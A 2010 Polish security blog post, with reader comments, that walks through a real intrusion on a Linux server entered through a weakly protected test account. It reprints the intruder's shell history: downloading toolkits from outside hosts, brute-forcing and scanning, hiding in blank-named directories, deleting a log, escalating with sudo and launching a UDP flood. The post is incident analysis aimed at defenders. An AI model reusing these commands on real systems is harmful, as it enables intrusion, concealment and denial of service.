02 listopada 2010

Historia pewnego włamania, oczywiście z morałem

Czytelnicy HARD CORE SECURITY LAB na pewno tak skutecznie zabezpieczają swe serwery, stacje robocze, a nawet podręczne elektroniczne gadżety, że z pewnością nie mogą zbyt często oglądać prawdziwego włamywacza w trakcie skutecznego penetrowania jakiegoś systemu. Dla wszystkich zainteresowanych dokładnym przebiegiem przykładowego włamania na serwer Linuksowy, mam więc małą niespodziankę. Oto historia pewnego autentycznego włamania.

Pewien czytelnik podesłał mi bardzo interesujący log dokumentujący skuteczne włamanie na jeden z jego własnych serwerów. Zobaczmy więc, jak doszło do całego zdarzenia oraz co też włamywacz kombinował już po uzyskaniu dostępu do systemu...

Wszystko zaczęło się od tego, że nieroztropny administrator założył sobie konto testowe o nazwie test, zabezpieczone hasłem... z resztą sami zgadnijcie jakim. Za pomocą tych prostych poświadczeń, do systemu na prawach zwykłego użytkownika dostał się włamywacz i natychmiast zaczął się bawić w najlepsze. Wszystko wyglądało dokładnie tak:

ls
echo pwd
echo $PWD
mkdir www
cd www/
vim index.html
w
uname -a
hostname -f
passwd
cat /proc/cpuinfo 
cd /dev/shm
ls -a
cD "" 
mkdir " "
cd " "
ls -a
cd /home/test
mkdir " "
cd " "
wget www.cipyback.home.ro/xxx.tar
tar xvf nou.tar
rm -rf nou.tar
cd probe/
./crack xxx.65
w
cd ..
rm -rf probe/
cd ..
rm -rf test/
w
cd /home
ls -a
last -20
cat /proc/cpuinfo 
uname -a
w
cd /home
ls -a
cd ..
ls -a
rm -rf sipscan7.1/
w
ps ax
kill -9 17604
w
cd /home
ls -a
last -20
hostname -f
w
ls -a
w
cd /dev/shm
ls -a
mkdir " "
cd " "
cd /home/test
wget teamhacking.netfirms.com/xxx.tgz
tar zxvf sip.tgz
rm -rf sip.tgz
cd sipscan7.1/
nano email 
screen
w
cd /dev/shm
cd
cD " "
cd /dev/shm
cd " "
mkdir " "
cd " "
cd /home/test
ls -a
cd " "
ls -a
wget www.cipyback.home.ro/xxx.tar
tar xvf nou.tar
rm -rf nou.tar
cd probe/
./crack xx.16
cd " "
ls -a
cd ..
ls -a
rm -rf .access.log/
cd " "
ls -a
cd probe/
ls -a
cat vuln.txt 
./crack xx.52
cd /home/test
wget corleone.athost.biz/xxx.tgz
tar zxvf sip.tgz
rm -rf sip.tgz
cd aloha/
ls -a
nano mail_to.test
nano mail_to.txt
screen
./svmap.py xxx.0.0.0-xxx.255.255.255

Po uzyskaniu uprawnień administracyjnych, zabawa trwała w najlepsze:

sudo -s
uname -a
exit
exit
w
ps -x
cd /var/tmp
ls -a
cd " "
ls -a
cd ..
wget pibo.com/.x/flood/xxx.tar
tar zxvf udp.tar
rm -rf udp.tar
chmod +x *
perl udp.pl xxx.102.52.202 0 0

Ciekaw jestem, jak oceniacie umiejętności oraz narzędzia wykorzystane przez tego włamywacza? Jedno jest natomiast pewne. Tworzenie testowych kont zabezpieczonych bardzo słabymi hasłami nigdy nie jest dobrym pomysłem i jest to jedna z najczęstszych furtek otwierających włamywaczom drogę do wielu serwerów oraz usług pracujących w Internecie.

Komentarze (20)

Wczytywanie... Logowanie...
  • Zalogowany jako
ale to Wam nie wyszło.

wget www.cipyback.home.ro/xxx.tar
tar xvf nou.tar

#fail
1 odpowiedź · aktywny 752 tygodni temu
To jest mały bonus dla spostrzegawczych, a Ty tak od razu fail :>.
to też nie, lol

wget corleone.athost.biz/xxx.tgz
tar zxvf sip.tgz
1 odpowiedź · aktywny mniej niż minuta temu
eee, zobacz wcześniejszą odpowiedź na tego niby faila.
"Po uzyskaniu uprawnień administracyjnych"
jak?
3 odpowiedzi · aktywny 752 tygodni temu
Wystarczył jeden mały exploicik. Z tym, że kernel nie był tam najnowszy, bo 2.6.18... ten serwer był generalnie trochę zapomniany...
2.6.18 ? debian stable =)

ej, skad masz moje bash_history ??!!
No troche fail - ale ktoś musiał być totalnym lamerem żeby bash_history zostawić ;ppp
6 odpowiedzi · aktywny 751 tygodni temu
Tak, chociażby po tym widzimy, że to nie był jakiś profesjonalista, mimo tego skutecznie (pewnie zazwyczaj w wyniku zaniedbań administracyjnych) udaje mu się buszować po cudzych serwerach...
# chattr +a /home/test/.bash_history i zaden haxor nie ominie
Tylko czy pliki rozmaitych logów po potraktowaniu chattr +a jeszcze w ogóle mogą potem normalnie funkcjonować :)?
no normalnie funkcjonuja, mozna appendowac, logrotate by sie wylozyl na tym, ale .bash_history da rade
rickkkkm, nie zauważyłeś, że koles miał roota?
Tak na marginesie - nawet gdyby nie miał roota, to i tak mógłby to obejść.
z tego co rozumiem to są logi wykonywanych poleceń na komputerze atakującego tak? W jaki zatem sposób wszedł w ich posiadanie właściciel serwera?

Ja początkujący :)
> Ciekaw jestem, jak oceniacie umiejętności oraz narzędzia

Umiejętności - co tu oceniać, rumuński script kiddie, widać tylko, że potrafi odpalić svmap i skaner ssh. A, i utworzyć katalog " ". Nie ma o czym gadać.

Narzędzia - zależy które. Niektóre skrypty fajnie napisane, niektóre beznadziejnie. Paczki, które koleś ściągał, na kolana nie powalają - śmieci w środku, dynamicznie zlinkowane binarki... taka tam zbieranina narzędzi. Wpisywanie swojego nicka do źródeł pscana jest żałosne.

No dobra, na kolana powalił mnie flooder udp - napisany na poziomie przedszkolaka, bez elementarnej znajomości perla.

Na marginesie - logi są niechronologiczne (robota screena), prawdopodobnie niekompletne, a na pewno przerobione (i nie mam na myśli powstawianych "xxx"). Początkowe polecenia wyglądają na robotę "admina" tego... hmm... debiana 4.0?
2 odpowiedzi · aktywny 751 tygodni temu
Mi to bardziej wygladalo na leniwego assemblerowca piszacego w perlu
Nigdy nie wiadomo, zawsze jest szansa, że włamywacz był na tyle kompetentny, że bez trudu potrafił wcielić się w rolę dzieciaka. Osiągnął swój cel minimalnym kosztem, 0-day'e z prywatnej kolekcji czekają na starcie z bardziej wymagającym przeciwnikiem.
Eksperci uznali atak za typowy incydent, któremu nie warto poświęcać uwagi.

Wiem, wiem mało prawdopodobne, ale kto wie... ;)

Wyślij nowy komentarz

Comments by